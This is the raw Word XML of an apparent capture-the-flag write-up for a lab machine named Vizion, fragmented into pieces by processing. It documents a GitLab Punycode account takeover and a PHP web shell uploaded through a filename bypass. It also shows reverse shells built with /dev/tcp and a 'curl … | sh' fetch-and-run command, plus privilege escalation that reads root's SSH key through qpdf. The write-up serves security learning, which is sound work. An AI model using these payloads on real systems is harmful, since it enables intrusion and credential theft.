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tzt0on96xgnd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rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.bz92aw8qfjhb" w:id="1"/>
      <w:bookmarkEnd w:id="1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Vizion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machine. If support is required, please open a ticket in the support channel on the Discord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rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.udidkntmthlu" w:id="2"/>
      <w:bookmarkEnd w:id="2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4"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnaissance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Initially, port enumeration was performed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95500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="14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It was identified that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corresponding to the web service, was open. When accessing the web service on port 80, an automatic redirect to the domain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vizion.hc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observed.</w:t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41788"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="14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7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machine’s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address was added to the local Linux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configuration file to allow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resolution of the domain during testing.</w:t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38234"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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service, it was possible to view the application interface currently running.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98963"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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9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subdomain fuzzing, the subdomain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tracking.hc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http://vizion.hc/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FUZZ.vizion.hc"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shubs-subdomains.txt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84500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="14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application, the web interface was displayed.</w:t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32100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="14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new fuzzing process was then performed, this time targeting the newly identified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tracking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subdomain, with the objective of mapping accessible files and directories. During enumeration, the route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/api/users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identified.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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19400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="14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discovered route, it was possible to identify the email address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alex.miller@vizion.hc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associated with an application user.</w:t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06700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="14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 this stage, during further enumeration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tracking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application, an authentication button was identified that allows login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SSO using GitLab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18088"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="14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0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this login option, the authentication flow redirected the navigation to a new subdomain: </w:t>
      </w:r>
      <w:hyperlink r:id="rId1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gitlab.vizion.hc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adding the subdomain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file, it was possible to resolve it correctly and access the corresponding application.</w:t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94238"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15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2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 this point,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alex.miller@vizion.hc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had already been identified, but no valid password was yet available to authenticate to the application.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GitLab instance in use presented a vulnerability that allows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Account Takeover via Punycode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making it possible to take control of an existing account in the system.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Punycode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an encoding method that converts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Unicode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characters (such as those used in Chinese, Arabic, Cyrillic alphabets, among others) into a representation composed only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ASCII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characters (letters, numbers, and hyphens).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Due to a specific behavior related to Punycode, a flaw was identified in GitLab’s handling and normalization of characters. Under this condition, the character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‘Ā’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interpreted as equivalent to the character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‘A’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during username comparison, allowing collisions and potential identity verification bypass.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comparison of characters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Punycode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can be verified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MySQL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script shown below, which is limited exclusively to user and password configuration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MySQL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Link: https://blog.voorivex.team/puny-code-0-click-account-takeover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mysql.connector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mysql.connector.connect(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host="localhost",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user="&lt;your-user&gt;",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password="&lt;your-password&gt;",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database="information_schema"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conn.cursor()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0x10ffff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chr(i)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cursor.execute("SELECT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%s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is_equal",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(char,))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cursor.fetchone()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result[0]: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print(f"Unicode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Character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{i}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({char})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MySQL")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cursor.close()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36900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="14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comparing characters, it is possible to understand how this information is handled in the application’s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back-end.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GitLab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application subdomain, there was already a legitimate user authenticated in the system with the email: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240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360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alex.miller@vizion.hc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Due to the lack of proper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Unicode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normalization during registration, it was possible to register a new user using a visually similar character, resulting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Ālex.miller@vizion.hc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character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Ā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(Unicode) is visually equivalent to the letter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but has a different encoding. The application accepted this registration without performing proper validation or normalization of the identifier.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internal processing, the system stored the new user in the database using the normalized form of the email, treating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Ālex.miller@vizion.hc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alex.miller@vizion.hc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As a result, a new record was created that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logically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collides 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legitimate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Consequently, the user created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Punycode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inherited the same permissions associated with the original user. This behavior allowed administrative actions on the legitimate account, including the password reset process.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flaw results in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account takeover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scenario, caused exclusively by the lack of proper Unicode/Punycode handling in the user registration and authentication flow.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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registration request was intercepted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Burp Suite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allowing the email field to be modified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Punycode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version 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Ālex.miller@vizion.hc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5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22600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15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63800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15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modifying the request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Burp Suite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was possible to gain access to the account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alex.miller@vizion.hc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confirming successful exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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67000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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this, it was possible to register on the subdomain  </w:t>
      </w:r>
      <w:hyperlink r:id="rId22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tracking.vizion.hc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GitLab SSO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already authenticated with the compromised user credentials. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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89538"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15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5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authorizing access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the application successfully authenticated the session, granting full access to the environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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99013"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15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0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Access to the subdomain was obtained using the account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alex.miller@vizion.hc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and it was also possible to view two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emails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available within the platform.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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24100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15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first email contained information that allowed access to a developer account on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gitlab.vizion.hc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developer@vizion.hc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AFea8phW3YlJRbJA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381625" cy="3981450"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15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9814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second email provided access credentials to the main domain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vizion.hc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matthew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Temporary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H6JUAMtkgw30tOsfp3xTb4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418676" cy="4794488"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15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8676" cy="47944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credentials discovered earlier, it was possible to successfully authenticate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GitLab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641600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="16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repository project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“vizion”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identified, corresponding to the main application in the environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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01900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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allowed full visibility of all web application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76600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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While analyzing the source code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dashboard.php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file, it was observed that on line 9 the POST request method is validated. On line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value is defined for the header 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gimme_premium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and on line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13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server checks for the presence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X-UPGRADE-TOKEN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header with the value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gimme-premium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Then, on line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check counts the occurrences of this header; if greater than 5, the system grants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premium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privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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51488"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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4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analyzed snippet reveals that sending the header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X-UPGRADE-TOKEN: gimme-premium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allows unauthorized access to premium features of the web application.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request was intercepted using a proxy, and the header was added manually.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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22763"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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7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90800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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sending these requests more than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five times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was sufficient to log in again to the web application.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Access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premium account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successfully obtained.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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31295"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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29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AUpon analyzing the premium account, it was identified that this functionality is related to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 upload feature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Reviewing the source code in the application’s repository revealed that this process is handled in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image-process.php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image-process.php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is responsible for the image upload functionality, accessible only to premium users. It stores uploaded files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/uploads/images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 and applies validation based on file extension, allowing only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jpg, jpeg, png, gif, and webp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files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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21000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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On line 73, a condition restricts file uploads to a specific set of allowed extensions. However, at a later stage in the execution flow, the code applies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explode()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function to the filename using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#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character as a delimiter and considers only the first index of the resulting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This inconsistency in validation logic allows malicious file extensions to be accepted, since the initial validation can be bypassed by manipulating the filename, such as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file.php#.jpeg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71900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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test file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shell.php#.jpg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created, containing a user-controlled parameter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that is passed directly to the system command execution function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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&lt;?php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system($_GET[0]);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55913"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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9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file was then uploaded. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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67000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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The upload succeeded, confirming exploitation of the flawed validation logic and improper file acceptance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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00400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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accessing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/uploads/images/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directory, it was possible to identify the file with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extension.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93900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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From this point forward, it became possible to execute operating system commands through the controllable parameter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(0)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present in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695581e3253e5_shell.php.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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77900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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vulnerability enabled remote and interactive command execution via the establishment of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/dev/tcp/&lt;vpn-ip&gt;/443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65463"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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4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89100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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qf6db5bb81du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Internal open ports were checked to identify which services were running and accessible internally.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-anlpt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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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internal port enumeration,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 9000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 as open, associated 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PHP-FPM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service.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This service allows execution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code, enabling interaction with the operating system through command execution from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interpreter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exploit this service, a compatible </w:t>
      </w:r>
      <w:hyperlink r:id="rId45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PHP-FPM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used, allowing execution of PHP code and interaction with the operating system.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transferring the exploit to the machine, it was executed with the objective of establishing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obtaining interactive remote access.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76300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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Through the exploit, it was possible to execute system commands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function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C5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 a result, the system requested a file hosted on an external server, whose contents were interpreted by the shell, establishing an active reverse shell. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C6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exploit.py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127.0.0.1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/var/www/html/index.php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'&lt;?php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system("curl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vpn-ip/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|sh");'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09700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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ind w:left="0" w:right="60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Below is the content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retrieved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interpreted by the shell. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CD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/dev/tcp/&lt;your-ip&gt;/443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35000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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 a result,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successfully established, obtaining interactive access to the system as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D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89100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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obtaining the reverse shell, the session was stabilized into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TTY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shell, enabling more stable interaction.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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35100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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0" w:right="60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user flag was located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home directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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89100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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r17emkaijla2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command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was identified that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has permission to execute the binary /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usr/bin/qpdf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without requiring a password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E7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81100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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qpdf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an open-source tool used to manipulate and transform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PDF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files.</w:t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addition to its primary functionality, when executed with elevated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privileges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allows reading internal system files.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this capability, it was possible to access and read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id_rsa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belonging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user.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--empty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id_rsa.pdf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--qdf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--add-attachment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/root/.ssh/id_rsa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33400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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   When reading the generated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id_rsa.pdf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the root user’s private SSH key was identified.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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397500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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this key, it was possible to authenticate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obtain access to the system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privileges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33700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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ind w:left="0" w:right="60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Full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access was obtained, granting complete control of the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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06500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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ind w:left="0" w:right="60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root flag is located in /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27538"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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5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58" w:type="default"/>
      <w:headerReference r:id="rId59" w:type="first"/>
      <w:headerReference r:id="rId60" w:type="even"/>
      <w:footerReference r:id="rId61" w:type="default"/>
      <w:footerReference r:id="rId62" w:type="first"/>
      <w:footerReference r:id="rId63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All rights reserved</w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.hprqxuhvn4rr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59" name="image44.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image44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1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2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220.98409448818896pt;mso-position-vertical-relative:margin;mso-position-vertical:absolute;margin-top:13686.635511811024pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId2" o:title="image20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2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11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Vizion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110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0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42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.githubusercontent.com/phith0n/9615e2420f31048f7e30f3937356cf75/raw/ffd7aa5b3a75ea903a0bb9cc106688da738722c5/fpm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48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId4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2.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tracking.vizion.hc" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://gitlab.vizion.hc" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4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4.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20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5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rufTYemG+9lij9ErO4CP+RTbJA==">CgMxLjAyDmgudHp0MG9uOTZ4Z25kMg5oLmJ6OTJhdzhxZmpoYjIOaC51ZGlka250bXRobHUyDmgucWY2ZGI1YmI4MWR1Mg5oLnIxN2Vta2FpamxhMjIOaC5ocHJxeHVodm40cnI4AHIhMVFuaXJCVm9ZWlNvQ1dhVG1LZlZPay1oeEk2d0lKUnZH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